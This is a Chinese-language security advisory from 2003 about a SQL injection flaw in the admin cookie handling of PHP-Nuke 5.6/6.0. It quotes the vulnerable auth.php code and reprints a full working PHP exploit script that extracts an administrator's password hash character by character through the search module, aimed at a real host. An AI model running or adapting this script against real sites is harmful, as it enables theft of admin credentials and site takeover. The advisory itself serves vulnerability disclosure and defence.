首页 -> 安全研究
安全研究
安全漏洞
PHP-Nuke Admin Cookie变量SQL注入漏洞
发布日期:2003-02-19
更新日期:2003-02-26
受影响系统:
Francisco Burzi PHP-Nuke 6.0描述:
Francisco Burzi PHP-Nuke 5.6
BUGTRAQ ID: 6890
PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
PHP-Nuke的管理员用户Cookie处理存在漏洞,远程攻击者可以利用这个漏洞修改SQL查询或管理员密码HASH字符串。
在PHP-Nuke中,管理员信息如下方法存储:
'username:password:'
密码以MD5加密,整个字符串以base64编码。
每次WEB页面被请求,'admin' cookie变量(包含用户名/密码值)会发送给PHP-Nuke脚本,每次通过auth.php进行合法性检查,检查代码如下:
// start code
if(isset($admin) && $admin != "") {
$admin = base64_decode($admin);
$admin = explode(":", $admin);
$aid = "$admin[0]";
$pwd = "$admin[1]";
$admlanguage = "$admin[2]";
if ($aid=="" || $pwd=="") {
$admintest=0;
echo "<html>\n";
echo "<title>INTRUDER ALERT!!!</title>\n";
echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n";
echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n";
echo "<font face=\"Verdana\" size=\"+4\"><b>Get Out!</b></font></center>\n";
echo "</body>\n";
echo "</html>\n";
exit;
}
$result=sql_query("select pwd from ".$prefix."_authors where aid='$aid'", $dbi);
if(!$result) {
echo "Selection from database failed!";
exit;
} else {
list($pass)=sql_fetch_row($result, $dbi);
if($pass == $pwd && $pass != "") {
$admintest = 1;
}
}
}
// end code
如上所示,$admin变量开始进行base64_decoded()操作,然后分为$aid和$pwd两个变量,当字符串包含一个或者多个引号被以base64编码时会发生安全问题,攻击者构建恶意Cookie提交给PHP-Nuke站点可导致修改SQL逻辑获得管理员密码HASH字符。
<*来源:David Zentner (david@cgishield.com)
链接:http://www.cgishield.com/?target=advisory&id=7
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
########## PHPnuke Auto-SelectFish Attacker
########## David@cgishield.com
########## works on phpnuke 5.6 and 6.0
// To use this program, simply upload it to a php enabled webserver, and execute
// If php times out before the whole password hash is determined,
// adjust the maximum script execution time in php.ini
// Also, replace following with correct values:
$server="www.phpnuke.org";
$script="/modules.php";
// Title of a story created specifically by the admin who is being hacked.
$data_to_match="Revolution";
$admin_account_name="nukelite";
$beginchar="1";
$endchar="33";
$admin_account_name=urlencode($admin_account_name);
$data_to_match=urlencode($data_to_match);
$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";
for($i=$beginchar;$i<$endchar;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){
$vars="name=Search&query=$data_to_match&topic=&category=&author=$admin_account_name&days=1000+and+mid(a.pwd,$i,1)=$checkchar[$i2]&type=stories";
$data=sendToHost("$server",'post',"$script","$vars");
if (eregi("No matches found to your query","$data")){
}
else{
echo("<br>$i= $i2"); flush();break;}
}
}
function sendToHost($host,$method,$path,$data,$useragent=1)
{
$method = strtoupper($method);
$fp = fsockopen($host,80);
fputs($fp, "$method $path HTTP/1.1\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
fputs($fp, "Content-length: " . strlen($data) . "\n");
if ($useragent)
fputs($fp, "User-Agent: Mozilla\n");
fputs($fp, "Connection: close\n\n");
if ($method == 'POST')
fputs($fp, $data);
while (!feof($fp))
$buf .= fgets($fp,128);
fclose($fp);
for($slow=0;$slow<100;$slow++){}
return $buf;
}
?>
建议:
厂商补丁:
Francisco Burzi
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpnuke.org
浏览次数:4650
严重程度:0(网友投票)
绿盟科技给您安全的保障